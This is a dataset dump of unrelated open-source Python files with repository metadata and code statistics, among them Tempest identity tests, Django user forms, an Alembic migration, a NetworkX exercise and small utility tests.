exogen/80sheep
a6da85f6c10c8088e2c86a186c2934e71e8d2d16
[ "MIT" ]
null
null
null
libsheep/state.py
exogen/80sheep
a6da85f6c10c8088e2c86a186c2934e71e8d2d16
[ "MIT" ]
null
null
null
from libsheep.filelist import FileListing class State(object): def __init__(self): self.file_list = FileListing(None) self.downloaded_lists = None self.hubs = None
24.125
42
0.683938
23
193
5.478261
0.73913
0.126984
0
0
0
0
0
0
0
0
0
0
0.238342
193
7
43
27.571429
0.857143
0
0
0
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0.166667
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c15a11bff5706bd78f8d5633560270d5f1288958
1,198
py
Python
Data Science With Python/22-network-analysis-in-python-(part-1)/02-important-nodes/07-networkx-betweenness-centrality-on-a-social-network.py
aimanahmedmoin1997/DataCamp
c6a6c4d59b83f14854bd76ed5c0c7f2dddd6de1d
[ "MIT" ]
3
2019-05-12T04:49:24.000Z
2020-05-06T00:40:28.000Z
Data Science With Python/22-network-analysis-in-python-(part-1)/02-important-nodes/07-networkx-betweenness-centrality-on-a-social-network.py
aimanahmedmoin1997/DataCamp
c6a6c4d59b83f14854bd76ed5c0c7f2dddd6de1d
[ "MIT" ]
null
null
null
Data Science With Python/22-network-analysis-in-python-(part-1)/02-important-nodes/07-networkx-betweenness-centrality-on-a-social-network.py
aimanahmedmoin1997/DataCamp
c6a6c4d59b83f14854bd76ed5c0c7f2dddd6de1d
[ "MIT" ]
7
2018-11-06T17:43:31.000Z
2020-11-07T21:08:16.000Z
''' NetworkX betweenness centrality on a social network Betweenness centrality is a node importance metric that uses information about the shortest paths in a network. It is defined as the fraction of all possible shortest paths between any pair of nodes that pass through the node. NetworkX provides the nx.betweenness_centrality(G) function for computing the betweenness centrality of every node in a graph, and it returns a dictionary where the keys are the nodes and the values are their betweenness centrality measures. INSTRUCTIONS 100XP Compute the betweenness centrality bet_cen of the nodes in the graph T. Compute the degree centrality deg_cen of the nodes in the graph T. Compare betweenness centrality to degree centrality by creating a scatterplot of the two, with list(bet_cen.values()) on the x-axis and list(deg_cen.values()) on the y-axis. ''' # Compute the betweenness centrality of T: bet_cen bet_cen = nx.betweenness_centrality(T) # Compute the degree centrality of T: deg_cen deg_cen = nx.degree_centrality(T) # Create a scatter plot of betweenness centrality and degree centrality plt.scatter(list(bet_cen.values()), list(deg_cen.values())) # Display the plot plt.show()
49.916667
241
0.803005
195
1,198
4.866667
0.379487
0.221286
0.075869
0.054795
0.106428
0.05058
0.05058
0.05058
0
0
0
0.002935
0.146912
1,198
24
242
49.916667
0.925636
0.864775
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c15b395be045c74bbf78970ce90b3d9d8a773036
667
py
Python
sktracker/ui/mpl/matplotlib_widget.py
bnoi/scikit-tracker
8771006a3a682ab299e4446c800c05f36a027df7
[ "BSD-3-Clause" ]
6
2016-03-03T12:45:32.000Z
2018-07-06T18:51:46.000Z
sktracker/ui/mpl/matplotlib_widget.py
bnoi/scikit-tracker
8771006a3a682ab299e4446c800c05f36a027df7
[ "BSD-3-Clause" ]
1
2021-05-12T07:54:20.000Z
2021-05-12T07:54:20.000Z
sktracker/ui/mpl/matplotlib_widget.py
bnoi/scikit-tracker
8771006a3a682ab299e4446c800c05f36a027df7
[ "BSD-3-Clause" ]
2
2017-11-27T13:40:43.000Z
2020-12-12T18:31:11.000Z
# -*- coding: utf-8 -*- from __future__ import unicode_literals from __future__ import division from __future__ import absolute_import from __future__ import print_function import matplotlib.pyplot as plt from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas class MatplotlibWidget(FigureCanvas): def __init__(self, figure, parent): """ """ super(MatplotlibWidget, self).__init__(figure) self.setParent(parent) self.fig = figure def close_figure(self): """ """ if self.fig: self.fig.clf() plt.close(self.fig) self.fig = None
23
80
0.656672
72
667
5.680556
0.486111
0.085575
0.156479
0.06846
0
0
0
0
0
0
0
0.004032
0.256372
667
28
81
23.821429
0.820565
0.031484
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0.375
0
0.5625
0.0625
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
c17c68ae3200877db56dbf358f2554f7b5e93369
630
py
Python
tests/test_key_store.py
brickgao/cos-python-sdk
52d22553e83d0be5c73e8d71a63417e275a32c8e
[ "MIT" ]
null
null
null
tests/test_key_store.py
brickgao/cos-python-sdk
52d22553e83d0be5c73e8d71a63417e275a32c8e
[ "MIT" ]
null
null
null
tests/test_key_store.py
brickgao/cos-python-sdk
52d22553e83d0be5c73e8d71a63417e275a32c8e
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from contentos_sdk.key_store import KeyStore def test_key_store(): key_store = KeyStore() key_store.add_key("account1", "key1") key_store.add_key("account2", "key2") assert key_store.get_key("account1") == "key1" assert key_store.get_accounts() == ["account1", "account2"] key_store.remove_key("account2") assert key_store.get_accounts() == ["account1"] key_store2 = KeyStore() key_store.dump_to_file("dummy", b"badpasswd") key_store2.load_from_file("dummy", b"badpasswd") assert key_store2.get_accounts() == key_store.get_accounts()
30
64
0.693651
86
630
4.755814
0.383721
0.215159
0.107579
0.124694
0.161369
0.161369
0
0
0
0
0
0.027985
0.149206
630
20
65
31.5
0.735075
0.068254
0
0
0
0
0.164103
0
0
0
0
0
0.307692
1
0.076923
false
0.153846
0.076923
0
0.153846
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
c18e05b054dc993ef3dcf4a3fdfe2bf5ac02fbe1
249
py
Python
examples/tutorial/lcu_events.py
TheodorStraube/lcu-driver
892e5695807a0ad27afa411b103a99fd64397f87
[ "MIT" ]
57
2019-06-07T09:35:00.000Z
2022-03-09T06:31:47.000Z
examples/tutorial/lcu_events.py
TheodorStraube/lcu-driver
892e5695807a0ad27afa411b103a99fd64397f87
[ "MIT" ]
11
2020-10-31T02:42:59.000Z
2022-03-18T02:46:33.000Z
examples/tutorial/lcu_events.py
TheodorStraube/lcu-driver
892e5695807a0ad27afa411b103a99fd64397f87
[ "MIT" ]
11
2021-01-07T19:09:09.000Z
2022-03-20T06:54:06.000Z
from lcu_driver import Connector connector = Connector() @connector.ready async def connect(connection): print('LCU API is ready to be used.') @connector.close async def disconnect(connection): print('Finished task') connector.start()
15.5625
41
0.742972
32
249
5.75
0.65625
0.293478
0.293478
0
0
0
0
0
0
0
0
0
0.156627
249
15
42
16.6
0.87619
0
0
0
0
0
0.164659
0
0
0
0
0
0
1
0
false
0
0.111111
0
0.111111
0.222222
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c1d04f40b1dc8ffd40c7e8d1d706e8daa03e9421
5,600
py
Python
tempest/tests/lib/services/identity/v3/test_protocols_client.py
cityofships/tempest
59aa6811a3664d88b8939603b8e974644fbe21fa
[ "Apache-2.0" ]
254
2015-01-05T19:22:52.000Z
2022-03-29T08:14:54.000Z
tempest/tests/lib/services/identity/v3/test_protocols_client.py
cityofships/tempest
59aa6811a3664d88b8939603b8e974644fbe21fa
[ "Apache-2.0" ]
13
2015-03-02T15:53:04.000Z
2022-02-16T02:28:14.000Z
tempest/tests/lib/services/identity/v3/test_protocols_client.py
cityofships/tempest
59aa6811a3664d88b8939603b8e974644fbe21fa
[ "Apache-2.0" ]
367
2015-01-07T15:05:39.000Z
2022-03-04T09:50:35.000Z
# Copyright 2020 Samsung Electronics Co., Ltd # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of # the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. from tempest.lib.services.identity.v3 import protocols_client from tempest.tests.lib import fake_auth_provider from tempest.tests.lib.services import base class TestProtocolsClient(base.BaseServiceTest): FAKE_PROTOCOLS_INFO = { "links": { "next": None, "previous": None, "self": "http://example.com/identity/v3/OS-FEDERATION/" + "identity_providers/FAKE_ID/protocols" }, "protocols": [ { "id": "fake_id1", "links": { "identity_provider": "http://example.com/identity/v3/" + "OS-FEDERATION/identity_providers/" + "FAKE_ID", "self": "http://example.com/identity/v3/OS-FEDERATION/" "identity_providers/FAKE_ID/protocols/fake_id1" }, "mapping_id": "fake123" } ] } FAKE_PROTOCOL_INFO = { "protocol": { "id": "fake_id1", "links": { "identity_provider": "http://example.com/identity/v3/OS-" + "FEDERATION/identity_providers/FAKE_ID", "self": "http://example.com/identity/v3/OS-FEDERATION/" + "identity_providers/FAKE_ID/protocols/fake_id1" }, "mapping_id": "fake123" } } def setUp(self): super(TestProtocolsClient, self).setUp() fake_auth = fake_auth_provider.FakeAuthProvider() self.client = protocols_client.ProtocolsClient( fake_auth, 'identity', 'regionOne') def _test_add_protocol_to_identity_provider(self, bytes_body=False): self.check_service_client_function( self.client.add_protocol_to_identity_provider, 'tempest.lib.common.rest_client.RestClient.put', self.FAKE_PROTOCOL_INFO, bytes_body, idp_id="FAKE_ID", protocol_id="fake_id1", status=201) def _test_list_protocols_of_identity_provider(self, bytes_body=False): self.check_service_client_function( self.client.list_protocols_of_identity_provider, 'tempest.lib.common.rest_client.RestClient.get', self.FAKE_PROTOCOLS_INFO, bytes_body, idp_id="FAKE_ID", status=200) def _test_get_protocol_for_identity_provider(self, bytes_body=False): self.check_service_client_function( self.client.get_protocol_for_identity_provider, 'tempest.lib.common.rest_client.RestClient.get', self.FAKE_PROTOCOL_INFO, bytes_body, idp_id="FAKE_ID", protocol_id="fake_id1", status=200) def _test_update_mapping_for_identity_provider(self, bytes_body=False): self.check_service_client_function( self.client.update_mapping_for_identity_provider, 'tempest.lib.common.rest_client.RestClient.patch', self.FAKE_PROTOCOL_INFO, bytes_body, idp_id="FAKE_ID", protocol_id="fake_id1", status=200) def _test_delete_protocol_from_identity_provider(self, bytes_body=False): self.check_service_client_function( self.client.delete_protocol_from_identity_provider, 'tempest.lib.common.rest_client.RestClient.delete', {}, bytes_body, idp_id="FAKE_ID", protocol_id="fake_id1", status=204) def test_add_protocol_to_identity_provider_with_str_body(self): self._test_add_protocol_to_identity_provider() def test_add_protocol_to_identity_provider_with_bytes_body(self): self._test_add_protocol_to_identity_provider(bytes_body=True) def test_list_protocols_of_identity_provider_with_str_body(self): self._test_list_protocols_of_identity_provider() def test_list_protocols_of_identity_provider_with_bytes_body(self): self._test_list_protocols_of_identity_provider(bytes_body=True) def test_get_protocol_for_identity_provider_with_str_body(self): self._test_get_protocol_for_identity_provider() def test_get_protocol_for_identity_provider_with_bytes_body(self): self._test_get_protocol_for_identity_provider(bytes_body=True) def test_update_mapping_for_identity_provider_with_str_body(self): self._test_update_mapping_for_identity_provider() def test_update_mapping_for_identity_provider_with_bytes_body(self): self._test_update_mapping_for_identity_provider(bytes_body=True) def test_delete_protocol_from_identity_provider_with_str_body(self): self._test_delete_protocol_from_identity_provider() def test_delete_protocol_from_identity_provider_with_bytes_body(self): self._test_delete_protocol_from_identity_provider(bytes_body=False)
39.716312
79
0.664286
658
5,600
5.226444
0.199088
0.14888
0.066298
0.046525
0.73248
0.712126
0.712126
0.671125
0.530387
0.344868
0
0.010287
0.253571
5,600
140
80
40
0.81244
0.104464
0
0.358491
0
0
0.1722
0.0852
0
0
0
0
0
1
0.150943
false
0
0.028302
0
0.207547
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c1d5ac280ecee69b50b2c5f6afb9b90afe4637a6
1,563
py
Python
LintCode/chapter 43/603. Largest Divisible Subset/.ipynb_checkpoints/solution-checkpoint.py
vincent507cpu/Comprehensive-Algorithm-Solution
04e01e49622457f09af2e1133954f043c0c92cb9
[ "MIT" ]
4
2020-06-26T00:45:53.000Z
2021-04-19T12:23:32.000Z
LintCode/chapter 43/603. Largest Divisible Subset/solution.py
vincent507cpu/LeetCode-Comprehensive-Solution
04e01e49622457f09af2e1133954f043c0c92cb9
[ "MIT" ]
null
null
null
LintCode/chapter 43/603. Largest Divisible Subset/solution.py
vincent507cpu/LeetCode-Comprehensive-Solution
04e01e49622457f09af2e1133954f043c0c92cb9
[ "MIT" ]
null
null
null
class Solution: # @param {int[]} nums a set of distinct positive integers # @return {int[]} the largest subset def largestDivisibleSubset(self, nums): # Write your code here if not nums: return 0 nums = sorted(nums) # n = len(nums) dp, prev = {}, {} for num in nums: dp[num] = 1 prev[num] = -1 last_num = nums[0] for num in nums: for factor in self.get_factors(num): if factor not in dp: continue if dp[num] < dp[factor] + 1: dp[num] = dp[factor] + 1 prev[num] = factor if dp[num] > dp[last_num]: last_num = num return self.get_path(prev, last_num) def get_path(self, prev, last_num): path = [] while last_num != -1: path.append(last_num) last_num = prev[last_num] return path[::-1] def get_factors(self, num): if num == 1: return [] factor = 1 factors = [] while factor * factor <= num: if num % factor == 0: factors.append(factor) if factor * factor != num and factor != 1: factors.append(num // factor) factor += 1 return factors
27.910714
61
0.408829
160
1,563
3.9125
0.26875
0.100639
0.033546
0.038339
0.044728
0
0
0
0
0
0
0.016753
0.503519
1,563
56
62
27.910714
0.789948
0.080614
0
0.052632
0
0
0
0
0
0
0
0.017857
0
1
0.078947
false
0
0
0
0.236842
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
2
c1eccd50c4c0bef0bc236ab007c3bb33cdd0926d
173
py
Python
Exercicios/Desafio013.py
victorhugof94/Python
8b42955634f3ae44bded350ac88396a02b1f6970
[ "MIT" ]
null
null
null
Exercicios/Desafio013.py
victorhugof94/Python
8b42955634f3ae44bded350ac88396a02b1f6970
[ "MIT" ]
null
null
null
Exercicios/Desafio013.py
victorhugof94/Python
8b42955634f3ae44bded350ac88396a02b1f6970
[ "MIT" ]
null
null
null
salario = float(input('valor do salario:')) aumento = salario + (salario* (15/100)) print('voce ganhou um aumento de salario seu salario agora é: R${:.2f}'.format(aumento))
43.25
88
0.705202
26
173
4.692308
0.730769
0
0
0
0
0
0
0
0
0
0
0.039735
0.127168
173
3
89
57.666667
0.768212
0
0
0
0
0
0.462428
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c1f4bb133035976b48bb331afd3017e6ebbc488d
1,908
py
Python
tests/test_utils.py
bccho/pass-glm
4ad14dd043532419dc413c509672b54d1eb8d516
[ "MIT" ]
null
null
null
tests/test_utils.py
bccho/pass-glm
4ad14dd043532419dc413c509672b54d1eb8d516
[ "MIT" ]
null
null
null
tests/test_utils.py
bccho/pass-glm
4ad14dd043532419dc413c509672b54d1eb8d516
[ "MIT" ]
null
null
null
import os import numpy.random as npr from numpy.testing import * import scipy.sparse as sp from passglm.utils import * def test_create_folder_if_not_exist(): try: print 'Creating test folder...' create_folder_if_not_exist('test_folder') assert os.path.exists('test_folder') print 'Trying to recreate test folder...' create_folder_if_not_exist('test_folder') assert os.path.exists('test_folder') finally: os.removedirs('test_folder') def test_call_with_superset_args(): def test_fun(a, b): return a+b args = {'a' : 4, 'b' : 2, 'c' : 'a', 'x' : 3} assert 6 == call_with_superset_args(test_fun, args) def test_ensure_dimension_matches(): A = npr.rand(20, 10) B = npr.rand(30, 5) AA, BB = ensure_dimension_matches(A, B, axis=0) assert AA.shape[0] == BB.shape[0] assert_allclose(B, BB) assert_allclose(A, AA[:A.shape[0],:]) assert_allclose(0, AA[A.shape[0]:,:]) AA, BB = ensure_dimension_matches(A, B, axis=1) assert AA.shape[1] == BB.shape[1] assert_allclose(A, AA) assert_allclose(B, BB[:,:B.shape[1]]) assert_allclose(0, BB[:,B.shape[1]:]) BB, AA = ensure_dimension_matches(B, A, axis=0) assert AA.shape[0] == BB.shape[0] assert_allclose(B, BB) assert_allclose(A, AA[:A.shape[0],:]) assert_allclose(0, AA[A.shape[0]:,:]) BB, AA = ensure_dimension_matches(B, A, axis=1) assert AA.shape[1] == BB.shape[1] assert_allclose(A, AA) assert_allclose(B, BB[:,:B.shape[1]]) assert_allclose(0, BB[:,B.shape[1]:]) A = sp.rand(20, 10) B = sp.rand(30, 5) BB, AA = ensure_dimension_matches(B, A, axis=1) A, B = A.toarray(), B.toarray() AA, BB = AA.toarray(), BB.toarray() assert AA.shape[1] == BB.shape[1] assert_allclose(A, AA) assert_allclose(B, BB[:,:B.shape[1]]) assert_allclose(0, BB[:,B.shape[1]:])
29.353846
55
0.62631
308
1,908
3.701299
0.198052
0.184211
0.115789
0.105263
0.668421
0.649123
0.649123
0.649123
0.575439
0.52193
0
0.031683
0.205975
1,908
64
56
29.8125
0.720792
0
0
0.5
0
0
0.060797
0
0
0
0
0
0.442308
0
null
null
0.019231
0.096154
null
null
0.038462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
1
0
0
0
0
0
0
0
0
2
de08610cedd78e43d431df85365d4dfba4c47907
4,193
py
Python
users/forms.py
amjadcp/bookingLine-grpA-miniProject
f57fc06f85edfb08f9c170757fddbf7b6de6f35a
[ "PostgreSQL", "Unlicense", "MIT" ]
null
null
null
users/forms.py
amjadcp/bookingLine-grpA-miniProject
f57fc06f85edfb08f9c170757fddbf7b6de6f35a
[ "PostgreSQL", "Unlicense", "MIT" ]
null
null
null
users/forms.py
amjadcp/bookingLine-grpA-miniProject
f57fc06f85edfb08f9c170757fddbf7b6de6f35a
[ "PostgreSQL", "Unlicense", "MIT" ]
null
null
null
from django import forms from django.contrib.auth.forms import UserCreationForm from .models import * class SignupForm(UserCreationForm): class Meta: model = User fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2') def __init__(self, *args, **kargs): super(SignupForm, self).__init__(*args, **kargs) self.fields['username'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Username' }) self.fields['first_name'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'First Name', 'name' : 'first_name', 'id' : 'first_name' }) self.fields['last_name'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Last Name', 'name' : 'last_name', 'id' : 'last_name', }) self.fields['email'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Email', 'name' : 'email', 'id' : 'email', }) self.fields['password1'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Password', 'name' : 'password1', 'id' : 'password1', }) self.fields['password2'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Confirm Password', 'name' : 'password2', 'id' : 'password2', }) class ProfileForm(forms.ModelForm): class Meta: model = Profile fields = ( 'name', 'phone', 'email', 'adhar', 'pdf_adhar', 'pic', 'passbook', 'address1', 'address2', 'district', 'state', 'pin' ) def __init__(self, *args, **kargs): super(ProfileForm, self).__init__(*args, **kargs) self.fields['name'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Name', 'name' : 'name', 'id' : 'name' }) self.fields['phone'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Phone Number', 'name' : 'phone', 'id' : 'phone' }) self.fields['email'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Email', 'name' : 'email', 'id' : 'email' }) self.fields['adhar'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Aadhar', 'name' : 'adhar', 'id' : 'adhar' }) self.fields['pdf_adhar'].widget.attrs.update({ 'class' : 'form-control', 'name' : 'pdf_adhar', 'id' : 'pdf_adhar' }) self.fields['pic'].widget.attrs.update({ 'class' : 'form-control', 'name' : 'pic', 'id' : 'pic' }) self.fields['passbook'].widget.attrs.update({ 'class' : 'form-control', 'name' : 'passbook', 'id' : 'passbook' }) self.fields['address1'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Address1', 'name' : 'address1', 'id' : 'address1' }) self.fields['address2'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'Address2', 'name' : 'address2', 'id' : 'address2' }) self.fields['district'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'District', 'name' : 'district', 'id' : 'district' }) self.fields['state'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'State', 'name' : 'state', 'id' : 'state' }) self.fields['pin'].widget.attrs.update({ 'class' : 'form-control', 'placeholder' : 'PIN code', 'name' : 'pin', 'id' : 'pin' })
32.007634
91
0.463153
348
4,193
5.5
0.149425
0.094044
0.159875
0.206897
0.516719
0.516719
0.462382
0.169279
0.094044
0.094044
0
0.006731
0.36227
4,193
131
92
32.007634
0.70905
0
0
0.380165
0
0
0.276824
0
0
0
0
0
0
1
0.016529
false
0.107438
0.024793
0
0.07438
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
a9b208fc8ef5bf90a9d2a6941fa2a45a0eec5410
8,536
py
Python
src/migrations/versions/0930fdefb325_initial_migration.py
vishaltanwar96/Py-iTrack
53fbd73829320337f204f3d03ec667ffa3477592
[ "MIT" ]
4
2020-08-06T11:07:20.000Z
2020-11-20T15:45:13.000Z
src/migrations/versions/0930fdefb325_initial_migration.py
vishaltanwar96/Py-iTrack
53fbd73829320337f204f3d03ec667ffa3477592
[ "MIT" ]
null
null
null
src/migrations/versions/0930fdefb325_initial_migration.py
vishaltanwar96/Py-iTrack
53fbd73829320337f204f3d03ec667ffa3477592
[ "MIT" ]
null
null
null
"""initial migration Revision ID: 0930fdefb325 Revises: Create Date: 2020-09-27 21:13:23.088570 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '0930fdefb325' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('criticality', sa.Column('id', sa.Integer(), nullable=False), sa.Column('value', sa.String(length=100), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('value') ) op.create_table('role', sa.Column('id', sa.Integer(), nullable=False), sa.Column('value', sa.String(length=100), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('value') ) op.create_table('status', sa.Column('id', sa.Integer(), nullable=False), sa.Column('value', sa.String(length=100), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('value') ) op.create_table('user', sa.Column('id', sa.Integer(), nullable=False), sa.Column('first_name', sa.String(length=30), nullable=False), sa.Column('last_name', sa.String(length=30), nullable=False), sa.Column('email', sa.String(length=200), nullable=False), sa.Column('password', sa.Text(), nullable=False), sa.Column('is_verified', sa.Boolean(), server_default=sa.text('0'), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True), sa.Column('role_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['role_id'], ['role.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('email') ) op.create_table('organisation', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=70), nullable=False), sa.Column('passcode', sa.Text(), nullable=False), sa.Column('location', sa.String(length=30), nullable=False), sa.Column('registered_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('registered_by', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['registered_by'], ['user.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('project', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=100), nullable=False), sa.Column('description', sa.String(length=255), server_default='', nullable=False), sa.Column('status_id', sa.Integer(), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('organisation_id', sa.Integer(), nullable=True), sa.Column('created_by', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['organisation_id'], ['organisation.id'], ), sa.ForeignKeyConstraint(['status_id'], ['status.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('user_organisation', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=False), sa.Column('organisation_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['organisation_id'], ['organisation.id'], ), sa.ForeignKeyConstraint(['user_id'], ['user.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('project_history', sa.Column('remarks', sa.Text(), server_default=sa.text('NULL'), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('id', sa.Integer(), nullable=False), sa.Column('project_id', sa.Integer(), nullable=False), sa.Column('created_by', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['project_id'], ['project.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('task', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=200), nullable=False), sa.Column('description', sa.Text(), nullable=False), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('created_by', sa.Integer(), nullable=True), sa.Column('assigned_by', sa.Integer(), nullable=True), sa.Column('assigned_to', sa.Integer(), nullable=True), sa.Column('reviewed_by', sa.Integer(), nullable=True), sa.Column('status_id', sa.Integer(), nullable=True), sa.Column('criticality_id', sa.Integer(), nullable=True), sa.Column('expected_completion_date', sa.DateTime(), sa.Computed('created_at + INTERVAL 3 DAY', persisted=True), nullable=False), sa.Column('project_id', sa.Integer(), nullable=True), sa.Column('actual_completion_date', sa.DateTime(), server_default=sa.text('NULL'), nullable=True), sa.ForeignKeyConstraint(['assigned_by'], ['user.id'], ), sa.ForeignKeyConstraint(['assigned_to'], ['user.id'], ), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['criticality_id'], ['criticality.id'], ), sa.ForeignKeyConstraint(['project_id'], ['project.id'], ), sa.ForeignKeyConstraint(['reviewed_by'], ['user.id'], ), sa.ForeignKeyConstraint(['status_id'], ['status.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('user_project', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=False), sa.Column('project_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['project_id'], ['project.id'], ), sa.ForeignKeyConstraint(['user_id'], ['user.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('task_history', sa.Column('remarks', sa.Text(), server_default=sa.text('NULL'), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('id', sa.Integer(), nullable=False), sa.Column('task_id', sa.Integer(), nullable=False), sa.Column('created_by', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['task_id'], ['task.id'], ), sa.PrimaryKeyConstraint('id') ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table('task_history') op.drop_table('user_project') op.drop_table('task') op.drop_table('project_history') op.drop_table('user_organisation') op.drop_table('project') op.drop_table('organisation') op.drop_table('user') op.drop_table('status') op.drop_table('role') op.drop_table('criticality') # ### end Alembic commands ###
55.428571
118
0.534911
841
8,536
5.312723
0.117717
0.100269
0.141003
0.150403
0.794763
0.771486
0.729857
0.689346
0.558863
0.501343
0
0.010974
0.306115
8,536
153
119
55.79085
0.743373
0.033622
0
0.433824
0
0
0.144301
0.005602
0
0
0
0
0
1
0.014706
false
0.014706
0.014706
0
0.029412
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9b9a871d28a4764dfb7693ea647326d7012450b
277
py
Python
cyder/cydhcp/workgroup/forms.py
drkitty/cyder
1babc443cc03aa51fa3c1015bcd22f0ea2e5f0f8
[ "BSD-3-Clause" ]
6
2015-04-16T23:18:22.000Z
2020-08-25T22:50:13.000Z
cyder/cydhcp/workgroup/forms.py
drkitty/cyder
1babc443cc03aa51fa3c1015bcd22f0ea2e5f0f8
[ "BSD-3-Clause" ]
267
2015-01-01T00:18:57.000Z
2015-10-14T00:01:13.000Z
cyder/cydhcp/workgroup/forms.py
drkitty/cyder
1babc443cc03aa51fa3c1015bcd22f0ea2e5f0f8
[ "BSD-3-Clause" ]
5
2015-03-23T00:57:09.000Z
2019-09-09T22:42:37.000Z
from django import forms from cyder.base.eav.forms import get_eav_form from cyder.cydhcp.workgroup.models import Workgroup, WorkgroupAV class WorkgroupForm(forms.ModelForm): class Meta: model = Workgroup WorkgroupAVForm = get_eav_form(WorkgroupAV, Workgroup)
19.785714
64
0.787004
35
277
6.114286
0.542857
0.084112
0.093458
0
0
0
0
0
0
0
0
0
0.151625
277
13
65
21.307692
0.910638
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.714286
0
0
0
0
